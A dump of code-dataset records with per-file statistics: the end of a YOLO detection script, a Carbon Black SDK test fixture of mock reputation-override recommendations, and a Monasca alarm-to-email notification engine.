bounding_box[0] = det_classes[i] bounding_box[1] = confd[i] bounding_box[2] = coords_xyminmax[i][0] bounding_box[3] = coords_xyminmax[i][1] bounding_box[4] = coords_xyminmax[i][2] bounding_box[5] = coords_xyminmax[i][3] bounding_box = str(bounding_box)[1:-1]# remove square brackets bounding_box = bounding_box.replace("'",'')# removing inverted commas around class name bounding_box = "".join(bounding_box.split())# remove spaces in between **here dont give space inbetween the inverted commas "". all_bounding_boxnind.append(bounding_box) all_bounding_boxnind = ' '.join(map(str, all_bounding_boxnind))# convert list to string all_bounding_boxnind=list(all_bounding_boxnind.split(' ')) # convert strin to list # replacing commas with spaces for i in range(len(all_bounding_boxnind)): all_bounding_boxnind[i] = all_bounding_boxnind[i].replace(',',' ') for i in range(len(all_bounding_boxnind)): # check if file exiscts else make new with open(out +'{}.txt'.format(name), "a+") as file_object: # Move read cursor to the start of file. file_object.seek(0) # If file is not empty then append '\n' data = file_object.read(100) if len(data) > 0 : file_object.write("\n") # Append text at the end of file file_object.write(all_bounding_boxnind[i]) #%% import glob, random import matplotlib.pyplot as plt import matplotlib as mpl mpl.rcParams['figure.dpi'] = 300 img_paths = glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.png') + \ glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.jpg') img_path = random.choice(img_paths) img1 = cv2.imread(img_path) img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2RGB) img_h, img_w, _ = img1.shape img2 = prepare_input(img1, 416, half) pred = model(img2, augment=False)[0] # Apply NMS pred = non_max_suppression(pred, conf_thres, iou_thres, classes=classes, agnostic=True) boxes = pred[0].cpu().detach().numpy() # <xmin><ymin><xmax><ymax><confd><class_id> coords_minmax = np.zeros((boxes.shape[0], 4)) # droping 5th value confd = np.zeros((boxes.shape[0], 1)) class_ids = np.zeros((boxes.shape[0], 1)) # assign coords_minmax = boxes[:,0:4] # coords confd = boxes[:,4] # confidence class_ids = boxes[:,5] # class id coords_xyminmax = [] det_classes = [] for i in range(boxes.shape[0]): coords_xyminmax.append(xyxy_2_xyxyo(img_w, img_h, coords_minmax[i])) det_classes.append(class_names[int(class_ids[i])]) t = np.asarray(coords_xyminmax) op = draw_boxes(img1, confd, t, det_classes, class_names, order='xy_minmax', analysis=False) plt.imshow(op) print('='*50) print('Image Name: ', os.path.basename(img_path),img1.shape) print('\nClass_name ', '| B_box Coords ', '| Confidence') print('_'*50) for k in range(len(det_classes)): print(det_classes[k], t[k], confd[k]) print('='*50)
36.833333
135
0.680927
0
0
0
0
0
0
0
0
1,786
0.244892
d5b2ddd3598b303bcb8230980f8ef5b2b4388ef0
5,712
py
Python
src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py
fslds/carbon-black-cloud-sdk-python
248a3c63d6b36d6fcdbcb3f51fb7751f062ed372
[ "MIT" ]
24
2020-10-16T22:07:38.000Z
2022-03-24T14:58:03.000Z
src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py
fslds/carbon-black-cloud-sdk-python
248a3c63d6b36d6fcdbcb3f51fb7751f062ed372
[ "MIT" ]
63
2020-10-26T18:26:15.000Z
2022-03-31T17:31:02.000Z
src/tests/unit/fixtures/endpoint_standard/mock_recommendation.py
fslds/carbon-black-cloud-sdk-python
248a3c63d6b36d6fcdbcb3f51fb7751f062ed372
[ "MIT" ]
10
2020-11-09T11:54:23.000Z
2022-03-24T20:44:00.000Z
"""Mock responses for recommendations.""" SEARCH_REQ = { "criteria": { "policy_type": ['reputation_override'], "status": ['NEW', 'REJECTED', 'ACCEPTED'], "hashes": ['111', '222'] }, "rows": 50, "sort": [ { "field": "impact_score", "order": "DESC" } ] } SEARCH_RESP = { "results": [ { "recommendation_id": "91e9158f-23cc-47fd-af7f-8f56e2206523", "rule_type": "reputation_override", "policy_id": 0, "new_rule": { "override_type": "SHA256", "override_list": "WHITE_LIST", "sha256_hash": "32d2be78c00056b577295aa0943d97a5c5a0be357183fcd714c7f5036e4bdede", "filename": "XprotectService", "application": { "type": "EXE", "value": "FOO" } }, "workflow": { "status": "NEW", "changed_by": "[email protected]", "create_time": "2021-05-18T16:37:07.000Z", "update_time": "2021-08-31T20:53:39.000Z", "comment": "Ours is the fury" }, "impact": { "org_adoption": "LOW", "impacted_devices": 45, "event_count": 76, "impact_score": 0, "update_time": "2021-05-18T16:37:07.000Z" } }, { "recommendation_id": "bd50c2b2-5403-4e9e-8863-9991f70df026", "rule_type": "reputation_override", "policy_id": 0, "new_rule": { "override_type": "SHA256", "override_list": "WHITE_LIST", "sha256_hash": "0bbc082cd8b3ff62898ad80a57cb5e1f379e3fcfa48fa2f9858901eb0c220dc0", "filename": "sophos ui.msi" }, "workflow": { "status": "NEW", "changed_by": "[email protected]", "create_time": "2021-05-18T16:37:07.000Z", "update_time": "2021-08-31T20:53:09.000Z", "comment": "Always pay your debts" }, "impact": { "org_adoption": "HIGH", "impacted_devices": 8, "event_count": 25, "impact_score": 0, "update_time": "2021-05-18T16:37:07.000Z" } }, { "recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68", "rule_type": "reputation_override", "policy_id": 0, "new_rule": { "override_type": "SHA256", "override_list": "WHITE_LIST", "sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124", "filename": "mimecast for outlook 7.8.0.125 (x86).msi" }, "workflow": { "status": "NEW", "changed_by": "[email protected]", "create_time": "2021-05-18T16:37:07.000Z", "update_time": "2021-08-31T15:13:40.000Z", "comment": "Winter is coming" }, "impact": { "org_adoption": "MEDIUM", "impacted_devices": 45, "event_count": 79, "impact_score": 0, "update_time": "2021-05-18T16:37:07.000Z" } } ], "num_found": 3 } ACTION_INIT = { "recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68", "rule_type": "reputation_override", "policy_id": 0, "new_rule": { "override_type": "SHA256", "override_list": "WHITE_LIST", "sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124", "filename": "mimecast for outlook 7.8.0.125 (x86).msi" }, "workflow": { "status": "NEW", "changed_by": "[email protected]", "create_time": "2021-05-18T16:37:07.000Z", "update_time": "2021-08-31T15:13:40.000Z", "comment": "Winter is coming" }, "impact": { "org_adoption": "MEDIUM", "impacted_devices": 45, "event_count": 79, "impact_score": 0, "update_time": "2021-05-18T16:37:07.000Z" } } ACTION_REQS = [ { "action": "ACCEPT", "comment": "Alpha" }, { "action": "RESET" }, { "action": "REJECT", "comment": "Charlie" }, ] ACTION_REFRESH_SEARCH = { "criteria": { "status": ['NEW', 'REJECTED', 'ACCEPTED'], "policy_type": ['reputation_override'] }, "rows": 50 } ACTION_SEARCH_RESP = { "results": [ACTION_INIT], "num_found": 1 } ACTION_REFRESH_STATUS = ['ACCEPTED', 'NEW', 'REJECTED'] ACTION_INIT_ACCEPTED = { "recommendation_id": "0d9da444-cfa7-4488-9fad-e2abab099b68", "rule_type": "reputation_override", "policy_id": 0, "new_rule": { "override_type": "SHA256", "override_list": "WHITE_LIST", "sha256_hash": "2272c5221e90f9762dfa38786da01b36a28a7da5556b07dec3523d1abc292124", "filename": "mimecast for outlook 7.8.0.125 (x86).msi" }, "workflow": { "status": "ACCEPTED", "ref_id": "e9410b754ea011ebbfd0db2585a41b07", "changed_by": "[email protected]", "create_time": "2021-05-18T16:37:07.000Z", "update_time": "2021-08-31T15:13:40.000Z", "comment": "Winter is coming" }, "impact": { "org_adoption": "MEDIUM", "impacted_devices": 45, "event_count": 79, "impact_score": 0, "update_time": "2021-05-18T16:37:07.000Z" } }
31.043478
98
0.500525
0
0
0
0
0
0
0
0
3,275
0.573354
d5b36222e5f117b24edaf10265aa3e6b8fc6c46c
7,351
py
Python
monasca/microservice/notification_engine.py
TeamZenith/python-monasca
badc86fbe2c4424deb15b84eabd3248e899ef4ee
[ "Apache-2.0" ]
null
null
null
monasca/microservice/notification_engine.py
TeamZenith/python-monasca
badc86fbe2c4424deb15b84eabd3248e899ef4ee
[ "Apache-2.0" ]
null
null
null
monasca/microservice/notification_engine.py
TeamZenith/python-monasca
badc86fbe2c4424deb15b84eabd3248e899ef4ee
[ "Apache-2.0" ]
null
null
null
# Copyright 2015 Carnegie Mellon University # # Author: Han Chen <[email protected]> # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import ast import json from oslo.config import cfg from stevedore import driver from monasca.common import es_conn from monasca.common import email_sender from monasca.common import kafka_conn from monasca.openstack.common import log from monasca.openstack.common import service as os_service es_opts = [ cfg.StrOpt('topic', default='alarm', help=('The topic that messages will be retrieved from.' 'This also will be used as a doc type when saved ' 'to ElasticSearch.')), cfg.StrOpt('topic2', default='notification_methods', help=('The topic that messages will be retrieved from.' 'This also will be used as a doc type when saved ' 'to ElasticSearch.')), cfg.StrOpt('doc_type', default='', help=('The document type which defines what document ' 'type the messages will be save into. If not ' 'specified, then the topic will be used.')), cfg.StrOpt('processor', default='', help=('The message processer to load to process the message.' 'If the message does not need to be process anyway,' 'leave the default')), ] es_group = cfg.OptGroup(name='notification', title='notification') cfg.CONF.register_group(es_group) cfg.CONF.register_opts(es_opts, es_group) LOG = log.getLogger(__name__) class NotificationEngine(os_service.Service): def __init__(self, threads=1000): super(NotificationEngine, self).__init__(threads) self._kafka_conn = kafka_conn.KafkaConnection( cfg.CONF.notification.topic) # Use doc_type if it is defined. if cfg.CONF.notification.doc_type: self._es_conn = es_conn.ESConnection( cfg.CONF.notification.doc_type) else: self._es_conn = es_conn.ESConnection( cfg.CONF.notification.topic2) def handle_alarm_msg(self, msg): if msg and msg.message: LOG.debug("Message received for alarm: " + msg.message.value) value = msg.message.value if value: # value's format is: # { # "metrics": { # "timestamp": 1432672915.409, # "name": "biz", # "value": 1500, # "dimensions": { # "key2": "value2", # "key1": "value1" # } # }, # "state_updated_timestamp": 1432672915, # "state": "ALARM", # "alarm-definition": { # "alarm_actions": [ # "c60ec47e-5038-4bf1-9f95-4046c6e9a759" # ], # "undetermined_actions": [ # "c60ec47e-5038-4bf1-9f95-4046c6e9a759" # ], # "name": "Average CPU percent greater than 10", # "match_by": [ # "hostname" # ], # "description": "The average CPU percent is greater than 10", # "ok_actions": [ # "c60ec47e-5038-4bf1-9f95-4046c6e9a759" # ], # "expression": "max(foo{hostname=mini-mon,mu=na}, 120) > 1100 # and max(bar { asd = asd} )>1200 or avg(biz)>1300", # "id": "c60ec47e-5038-4bf1-9f95-4046c6e91111", # "severity": "LOW" # } # } # convert to dict, and get state to determine the actions(notification method id) needed. # the method id can be used to match the notification method in elasticSearch # Then an email will be sent (TODO: phone txt msg are not dealt with for now) dict_msg = ast.literal_eval(value) state = dict_msg["state"] if state not in ["ALARM","OK","UNDETERMINED"]: LOG.error("state of alarm is not defined as expected") return actions = [] if state == 'ALARM': actions = dict_msg["alarm-definition"]["alarm_actions"] if state == 'OK': actions = dict_msg["alarm-definition"]["ok_actions"] if state == 'UNDETERMINED': actions = dict_msg["alarm-definition"]["undetermined_actions"] addresses = [] types = [] # the action_id is an id of notification method # there can be multiple ids in one alarm message with different types for action_id in actions: es_res = self._es_conn.get_message_by_id(action_id) def _get_notification_method_response(res): if res and res.status_code == 200: obj = res.json() if obj: return obj.get('hits') return None else: return None es_res = _get_notification_method_response(es_res) LOG.debug('Query to ElasticSearch returned: %s' % es_res) if es_res is None: LOG.error("The provided is not defined as expected") return name = es_res["hits"][0]["_source"]["name"] type = es_res["hits"][0]["_source"]["type"] address = es_res["hits"][0]["_source"]["address"] types.append(type) addresses.append(address) email_addresses = [] for i in range(len(types)): if types[i] == "EMAIL": email_addresses.append(addresses[i]) email_sender.send_emails(email_addresses, "Alarm to User", dict_msg["alarm-definition"]["description"]) def start(self): while True: try: for msg in self._kafka_conn.get_messages(): self.handle_alarm_msg(msg) # if autocommit is set, this will be a no-op call. self._kafka_conn.commit() except Exception: LOG.exception('Error occurred while handling kafka messages.') def stop(self): self._kafka_conn.close() super(NotificationEngine, self).stop()
39.951087
119
0.522786
5,217
0.709699
0
0
0
0
0
0
3,040
0.413549